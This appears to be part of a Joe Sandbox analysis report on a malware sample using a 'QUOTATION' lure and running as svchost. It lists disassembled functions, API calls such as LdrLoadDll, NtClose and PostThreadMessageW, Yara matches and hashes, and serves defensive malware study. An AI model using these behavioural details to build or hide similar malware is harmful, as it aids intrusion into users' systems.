                                                                                      • Instruction ID: 424b2878ce6d68d5f28f374a3464f64698d356b7b3d6766036641e7a4be95276
                                                                                      • Opcode Fuzzy Hash: 1935afc4de01c3fdccfe32bc1e980a891f704fc0e011dea36defebf1d46fa746
                                                                                      • Instruction Fuzzy Hash: 07D0C976394310BAE668BB70AC1FFC67A549B10B15F0049167645AA1D0DAA0A8818A94
                                                                                      Function 00152356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0015236C
                                                                                      • PostMessageW.USER32(00000000), ref: 00152373
                                                                                        • Part of subcall function 0012E97B: Sleep.KERNEL32 ref: 0012E9F3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                      • String ID: Shell_TrayWnd
                                                                                      • API String ID: 529655941-2988720461
                                                                                      • Opcode ID: a9f7162eb8017c5aecdb6bd7b56444f46da331ef866de92bcd4859ca1594ba94
                                                                                      • Instruction ID: 3665c2c9e7e03b31a58c0e280893813c81cebe220cc8f8a6cc2793fe9b8246c7
                                                                                      • Opcode Fuzzy Hash: a9f7162eb8017c5aecdb6bd7b56444f46da331ef866de92bcd4859ca1594ba94
                                                                                      • Instruction Fuzzy Hash: 88D0C9723D1310BEE668BB70AC1FFC676549B14B15F4049167645AA1D0DAA0A8818A94
                                                                                      Function 000FBDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 000FBE93
                                                                                      • GetLastError.KERNEL32 ref: 000FBEA1
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 000FBEFC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 1717984340-0
                                                                                      • Opcode ID: 7ea89eafef56f0bd70ae3cc4e3c041059ac361ccd8ce3e2a506c416288021723
                                                                                      • Instruction ID: 0404d657a9bc5467b117c5579d690e834103ce724a262660a2ed0071fd0dcaa7
                                                                                      • Opcode Fuzzy Hash: 7ea89eafef56f0bd70ae3cc4e3c041059ac361ccd8ce3e2a506c416288021723
                                                                                      • Instruction Fuzzy Hash: 4641C13460420AEFCB718F65CC44ABA7BE5EF41320F294169FA599B5A2DB318D04EF60

                                                                                      Execution Graph

                                                                                      Execution Coverage:1.2%
                                                                                      Dynamic/Decrypted Code Coverage:5%
                                                                                      Signature Coverage:7.9%
                                                                                      Total number of Nodes:139
                                                                                      Total number of Limit Nodes:10
                                                                                      execution_graph 90136 42c063 90137 42c07d 90136->90137 90140 3872d10 LdrInitializeThunk 90137->90140 90138 42c0a1 90140->90138 90141 4250c3 90145 4250dc 90141->90145 90142 425127 90149 42eaf3 90142->90149 90145->90142 90146 425164 90145->90146 90148 425169 90145->90148 90147 42eaf3 RtlFreeHeap 90146->90147 90147->90148 90152 42cd83 90149->90152 90151 425134 90153 42cda0 90152->90153 90154 42cdad RtlFreeHeap 90153->90154 90154->90151 90173 424d33 90174 424d4f 90173->90174 90175 424d77 90174->90175 90176 424d8b 90174->90176 90177 42ca33 NtClose 90175->90177 90178 42ca33 NtClose 90176->90178 90179 424d80 90177->90179 90180 424d94 90178->90180 90183 42ec13 RtlAllocateHeap 90180->90183 90182 424d9f 90183->90182 90184 42ebd3 90187 42cd43 90184->90187 90186 42ebee 90188 42cd5d 90187->90188 90189 42cd6a RtlAllocateHeap 90188->90189 90189->90186 90190 42fbf3 90191 42eaf3 RtlFreeHeap 90190->90191 90192 42fc08 90191->90192 90155 414303 90156 41430c 90155->90156 90161 417ad3 90156->90161 90158 41433b 90159 414380 90158->90159 90160 41436f PostThreadMessageW 90158->90160 90160->90159 90162 417af7 90161->90162 90163 417afe 90162->90163 90164 417b36 LdrLoadDll 90162->90164 90163->90158 90164->90163 90165 41b5e3 90166 41b627 90165->90166 90168 41b648 90166->90168 90169 42ca33 90166->90169 90170 42ca4d 90169->90170 90171 42ca5a NtClose 90170->90171 90171->90168 90193 41a893 90194 41a8ab 90193->90194 90196 41a905 90193->90196 90194->90196 90197 41e7f3 90194->90197 90198 41e819 90197->90198 90202 41e910 90198->90202 90203 42fc33 RtlAllocateHeap RtlFreeHeap 90198->90203 90200 41e8ae 90200->90202 90204 42c0b3 90200->90204 90202->90196 90203->90200 90205 42c0d0 90204->90205 90208 3872b2a 90205->90208 90206 42c0f8 90206->90202 90209 3872b31 90208->90209 90210 3872b3f LdrInitializeThunk 90208->90210 90209->90206 90210->90206 90172 3872a80 LdrInitializeThunk 90211 419098 90212 42ca33 NtClose 90211->90212 90213 4190a2 90212->90213 90214 401b9d 90215 401bc7 90214->90215 90218 430063 90215->90218 90221 42e6a3 90218->90221 90222 42e6c9 90221->90222 90233 407463 90222->90233 90224 42e6df 90232 401c11 90224->90232 90236 41b3f3 90224->90236 90226 42e713 90247 428603 90226->90247 90227 42e6fe 90227->90226 90251 42cdd3 90227->90251 90230 42e72d 90231 42cdd3 ExitProcess 90230->90231 90231->90232 90235 407470 90233->90235 90254 416793 90233->90254 90235->90224 90237 41b41f 90236->90237 90265 41b2e3 90237->90265 90240 41b44c 90241 42ca33 NtClose 90240->90241 90244 41b457 90240->90244 90241->90244 90242 41b480 90242->90227 90243 41b464 90243->90242 90245 42ca33 NtClose 90243->90245 90244->90227 90246 41b476 90245->90246 90246->90227 90248 428665 90247->90248 90250 428672 90248->90250 90276 418943 90248->90276 90250->90230 90252 42cdf0 90251->90252 90253 42ce01 ExitProcess 90252->90253 90253->90226 90255 4167b0 90254->90255 90257 4167c5 90255->90257 90258 42d483 90255->90258 90257->90235 90259 42d49d 90258->90259 90260 42d4cc 90259->90260 90261 42c0b3 LdrInitializeThunk 90259->90261 90260->90257 90262 42d528 90261->90262 90263 42eaf3 RtlFreeHeap 90262->90263 90264 42d541 90263->90264 90264->90257 90266 41b3d9 90265->90266 90267 41b2fd 90265->90267 90266->90240 90266->90243 90271 42c153 90267->90271 90270 42ca33 NtClose 90270->90266 90272 42c170 90271->90272 90275 38734e0 LdrInitializeThunk 90272->90275 90273 41b3cd 90273->90270 90275->90273 90278 41896d 90276->90278 90277 418e7b 90277->90250 90278->90277 90284 413f73 90278->90284 90280 418a9a 90280->90277 90281 42eaf3 RtlFreeHeap 90280->90281 90282 418ab2 90281->90282 90282->90277 90283 42cdd3 ExitProcess 90282->90283 90283->90277 90288 413f93 90284->90288 90286 413ffc 90286->90280 90288->90286 90289 41b703 90288->90289 90290 41b728 90289->90290 90296 429da3 90290->90296 90292 41b759 90293 413ff2 90292->90293 90295 42eaf3 RtlFreeHeap 90292->90295 90301 41b543 LdrInitializeThunk 90292->90301 90293->90280 90295->90292 90298 429e08 90296->90298 90297 429e3b 90297->90292 90298->90297 90302 413dd3 90298->90302 90300 429e1d 90300->90292 90301->90292 90303 413da0 90302->90303 90304 413e0d 90302->90304 90303->90304 90307 42ccb3 90303->90307 90304->90300 90308 42cccd 90307->90308 90311 3872b90 LdrInitializeThunk 90308->90311 90309 413db5 90309->90300 90311->90309

                                                                                      Executed Functions

                                                                                      Function 00417AD3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 207 417ad3-417aef 208 417af7-417afc 207->208 209 417af2 call 42f6d3 207->209 210 417b02-417b10 call 42fcd3 208->210 211 417afe-417b01 208->211 209->208 214 417b20-417b31 call 42e173 210->214 215 417b12-417b1d call 42ff73 210->215 220 417b33-417b47 LdrLoadDll 214->220 221 417b4a-417b4d 214->221 215->214 220->221
                                                                                      APIs
                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417B45
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.289274740765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Load
                                                                                      • String ID:
                                                                                      • API String ID: 2234796835-0
                                                                                      • Opcode ID: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                                                      • Instruction ID: 683b89875a7fb83d71da6e1f8a97b79be180c124f2fa609aa3b8b71e39b295bb
                                                                                      • Opcode Fuzzy Hash: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                                                      • Instruction Fuzzy Hash: F7011EB5E4420DBBDB10DAA5DC42FDEB378AB54308F4041AAE90897240F635EB588B95
                                                                                      Function 0042CA33 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 233 42ca33-42ca68 call 404803 call 42dc73 NtClose
                                                                                      APIs
                                                                                      • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CA63
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.289274740765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Close
                                                                                      • String ID:
                                                                                      • API String ID: 3535843008-0
                                                                                      • Opcode ID: 66657d5b165b02af58b5b66cdb422c5b63c672e050058a705595915231ac49b7
                                                                                      • Instruction ID: 50a5b69ca1682e878e5a40afd65bd8ed1634e2dbd60f648430f8de340d975e9a
                                                                                      • Opcode Fuzzy Hash: 66657d5b165b02af58b5b66cdb422c5b63c672e050058a705595915231ac49b7
                                                                                      • Instruction Fuzzy Hash: B5E08C763402147BE720FB5AEC42F9B776CDFC5710F10852AFA08A7281C6B4B90186F8
                                                                                      Function 03872B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 248 3872b90-3872b9c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_3800000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: ed489058d7c0c3d223a2fe8c5d1c888034d2db14b4b083cf77c01dbae813c4db
                                                                                      • Instruction ID: 6f7dc9dc84e8267195c912612bde4f32e2718c40121fee52bd86356cd656078c
                                                                                      • Opcode Fuzzy Hash: ed489058d7c0c3d223a2fe8c5d1c888034d2db14b4b083cf77c01dbae813c4db
                                                                                      • Instruction Fuzzy Hash: EC90023120108C42D510B398850474A000587D0301F95CC55A5418658DC7A588957121
                                                                                      Function 03872A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 247 3872a80-3872a8c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_3800000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 36150536791fb470b700a19735b0ef8889d0b3534bfa97eb93ac220b61bd68bf
                                                                                      • Instruction ID: b38caf5e8dc87ec186c855554552f9d8c3db2fb34d0ad267353d4d155fa7d434
                                                                                      • Opcode Fuzzy Hash: 36150536791fb470b700a19735b0ef8889d0b3534bfa97eb93ac220b61bd68bf
                                                                                      • Instruction Fuzzy Hash: 88900261202004434505B3984514616400A87E0301B91C865E2008590DC63588957125
                                                                                      Function 03872D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 249 3872d10-3872d1c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_3800000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 2f39fca1e5092a39af1b5e9e79c2792af02c729bb85a4434d84eca5581254394
                                                                                      • Instruction ID: 43c2b848878c6a37c832f1e18684ad143e5fbedf7fd05c4b5cba2b09e15accde
                                                                                      • Opcode Fuzzy Hash: 2f39fca1e5092a39af1b5e9e79c2792af02c729bb85a4434d84eca5581254394
                                                                                      • Instruction Fuzzy Hash: 3490023120100853D511B3984604707000987D0341FD1CC56A1418558DD7668956B121
                                                                                      Function 038734E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_3800000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: d445b3def86bb8bd8944004d2bf67ea4084fe8294ba4a465fb1fe19188c6138b
                                                                                      • Instruction ID: 3ced9c95db0e51830220f90e1158efc3a8ccfa86b0017126a78b7821b8bd8874
                                                                                      • Opcode Fuzzy Hash: d445b3def86bb8bd8944004d2bf67ea4084fe8294ba4a465fb1fe19188c6138b
                                                                                      • Instruction Fuzzy Hash: 0990023160510842D500B3984614706100587D0301FA1CC55A1418568DC7A5895575A2
                                                                                      Function 004142FB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • PostThreadMessageW.USER32(b427-I_1,00000111,00000000,00000000), ref: 0041437A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.289274740765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: MessagePostThread
                                                                                      • String ID: b427-I_1$b427-I_1
                                                                                      • API String ID: 1836367815-3731361855
                                                                                      • Opcode ID: e31239851aee85a2536cf6da61f787cff518875e27f6edfaa8e2894a84858e00
                                                                                      • Instruction ID: 1c1b804c52c0fa2fc79735cf8757f94194e925b2cf622f9804a62bf2283c9d4a
                                                                                      • Opcode Fuzzy Hash: e31239851aee85a2536cf6da61f787cff518875e27f6edfaa8e2894a84858e00
                                                                                      • Instruction Fuzzy Hash: 4001A5B2D4111CBAEB119AD19D82DEFBB7CDF40398F00816AFA1467141D6784E468BA5
                                                                                      Function 00414303 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • PostThreadMessageW.USER32(b427-I_1,00000111,00000000,00000000), ref: 0041437A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.289274740765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: MessagePostThread
                                                                                      • String ID: b427-I_1$b427-I_1
                                                                                      • API String ID: 1836367815-3731361855
                                                                                      • Opcode ID: c2470579c8be65e49bfd338019fbf368160fbece63dc37d02d7ce0922c0166ce
                                                                                      • Instruction ID: 66382633165677f4d287f1c9305a2e0242bca7fee9ac24ed2ff299bc6a34d21b
                                                                                      • Opcode Fuzzy Hash: c2470579c8be65e49bfd338019fbf368160fbece63dc37d02d7ce0922c0166ce
                                                                                      • Instruction Fuzzy Hash: 9401D6B2E4021CBADB10AAE19C82DEFBB7CDF40798F008169FA1467141D6785E068BB5
                                                                                      Function 004142CD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55threadwindowCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • PostThreadMessageW.USER32(b427-I_1,00000111,00000000,00000000), ref: 0041437A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.289274740765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: MessagePostThread
                                                                                      • String ID: b427-I_1$b427-I_1
                                                                                      • API String ID: 1836367815-3731361855
                                                                                      • Opcode ID: 0c78152fe7af9bfe9666a3fbd71234cde2823069974fff51629e0b809ca46a0d
                                                                                      • Instruction ID: e66581b55692d0f67d3645e7f83c5c9d5bac99b1c31a45c43741cea5d306e683
                                                                                      • Opcode Fuzzy Hash: 0c78152fe7af9bfe9666a3fbd71234cde2823069974fff51629e0b809ca46a0d
                                                                                      • Instruction Fuzzy Hash: C301B5B2E4021CBADB119BD19C81DEFBB7CDF80398F00816AFA2467141D67C4E468BA5
                                                                                      Function 00417B83 Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 193 417b83-417b87 194 417b89-417ba2 193->194 195 417b6f 193->195 198 417ba4-417be0 194->198 199 417b5f-417b62 194->199 196 417b71-417b7f 195->196 197 417b36-417b47 LdrLoadDll 195->197 203 417b81-417b82 196->203 204 417bfd-417c19 196->204 201 417b4a-417b4d 197->201 205 417be2-417bf3 198->205 206 417bf4-417c19 198->206 205->206
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.289274740765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4e7030420652704376b12194149c07a63f315160b8825ddd380f325685b21786
                                                                                      • Instruction ID: 5fe7b0e3159e894076f386ae4157a7bafd75539a6ed586e2fa135baba6e0e4fa
                                                                                      • Opcode Fuzzy Hash: 4e7030420652704376b12194149c07a63f315160b8825ddd380f325685b21786
                                                                                      • Instruction Fuzzy Hash: 7E21683192D2449FDB21CA75C9866E4BB74FB9A725F1406CBD091CF242D335AC8AC784
                                                                                      Function 0042CD43 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 223 42cd43-42cd80 call 404803 call 42dc73 RtlAllocateHeap
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(?,0041E8AE,?,?,00000000,?,0041E8AE,?,?,?), ref: 0042CD7B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.289274740765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      • Opcode ID: 27af925cc09fa346fafd11b2d7a9bc6e46addc919f118a8ecb37a125f7b6b630
                                                                                      • Instruction ID: f9903ddc43aa1d478041010c95bd812e84ae6d930a69b2ca5004dc81876241ec
                                                                                      • Opcode Fuzzy Hash: 27af925cc09fa346fafd11b2d7a9bc6e46addc919f118a8ecb37a125f7b6b630
                                                                                      • Instruction Fuzzy Hash: F3E092B1200204BBD710EF49EC41F9B77ACEFC5750F108419FD08A7241D670B910CAB8
                                                                                      Function 0042CD83 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 228 42cd83-42cdc3 call 404803 call 42dc73 RtlFreeHeap
                                                                                      APIs
                                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,0B05C6C1,00000007,00000000,00000004,00000000,00417355,000000F4), ref: 0042CDBE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.289274740765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FreeHeap
                                                                                      • String ID:
                                                                                      • API String ID: 3298025750-0
                                                                                      • Opcode ID: 3ae13e125d1d646a9bdf0d6dc878b17524a9d002341fa1517782c7adab021431
                                                                                      • Instruction ID: 9d094757069ee7fafe8343a4ae1169e8157d0d769102895cf672c55cae1e0208
                                                                                      • Opcode Fuzzy Hash: 3ae13e125d1d646a9bdf0d6dc878b17524a9d002341fa1517782c7adab021431
                                                                                      • Instruction Fuzzy Hash: 7AE092B52002147BDB10EE4ADC41F9B33ACEFC5710F004419FD08A7241C6B0B9108AB8
                                                                                      Function 0042CDD3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 238 42cdd3-42ce0f call 404803 call 42dc73 ExitProcess
                                                                                      APIs
                                                                                      • ExitProcess.KERNEL32(?,00000000,00000000,?,3D88789B,?,?,3D88789B), ref: 0042CE0A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.289274740765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ExitProcess
                                                                                      • String ID:
                                                                                      • API String ID: 621844428-0
                                                                                      • Opcode ID: d4e777c894d90f951efbef4aca7f82a43814a062413fce3ac0bea4ee7a49ce04
                                                                                      • Instruction ID: 98d1125bebf2f9484b9d6ff066c81308abae10eb618a57f9fb154900a1da49d8
                                                                                      • Opcode Fuzzy Hash: d4e777c894d90f951efbef4aca7f82a43814a062413fce3ac0bea4ee7a49ce04
                                                                                      • Instruction Fuzzy Hash: 40E04F7A2102147BD210BA5ADC01F97776CDFC5714F10446AFA1867241C6B17A01C6F4
                                                                                      Function 03872B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 243 3872b2a-3872b2f 244 3872b31-3872b38 243->244 245 3872b3f-3872b46 LdrInitializeThunk 243->245
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_3800000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 39b69c3cbc69dc8f352924c9492b0823a9abbb2b68acad9a431d2cfca6165e76
                                                                                      • Instruction ID: 23ea0c17eaeb4c8ae265c746fad7bdf29b0661e7ccfbf6f1f913a36c05606348
                                                                                      • Opcode Fuzzy Hash: 39b69c3cbc69dc8f352924c9492b0823a9abbb2b68acad9a431d2cfca6165e76
                                                                                      • Instruction Fuzzy Hash: 8EB09B719014C5C5DE11E7A0470C7177905A7D0701F55C8D5D2464641F8738D095F275

                                                                                      Non-executed Functions

                                                                                      Function 0387088E Relevance: .6, Instructions: 606COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_3800000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 7cdfc778d27fcb0daa6c3c5deeb25d19594d8d3e7fff55f4ffa30eff6a1b318e
                                                                                      • Instruction ID: 40a5f30f5062a4f824276a967b0d58ec5c9dcea26602604b975e0353d8be1d60
                                                                                      • Opcode Fuzzy Hash: 7cdfc778d27fcb0daa6c3c5deeb25d19594d8d3e7fff55f4ffa30eff6a1b318e
                                                                                      • Instruction Fuzzy Hash: C4426BB59007199FEB60CFA8C880BAAB7F5BF04314F1445E9E959DB241E770EA84CF61
                                                                                      Function 03874260 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_3800000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 952d418ec5bb29f82c85fc62840270291ec89178fb619acf96684762666e35bc
                                                                                      • Instruction ID: 3667784f26712fe24673a140b7baaa2c1c28006e0c84c67f761e62f91a86e567
                                                                                      • Opcode Fuzzy Hash: 952d418ec5bb29f82c85fc62840270291ec89178fb619acf96684762666e35bc
                                                                                      • Instruction Fuzzy Hash: 60900231605404529540B3984984546400597E0301B91C855E1418554CCB24895A6361
                                                                                      Function 03874570 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_3800000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 957ab69b264a0b362c49b71054128b24f928462b8a419abb6b0918b513626d68
                                                                                      • Instruction ID: 29c0baf9bcd3e6f55a8f3a70cae4474dd4be859051d3ccf1a9fbdce1b54eb957
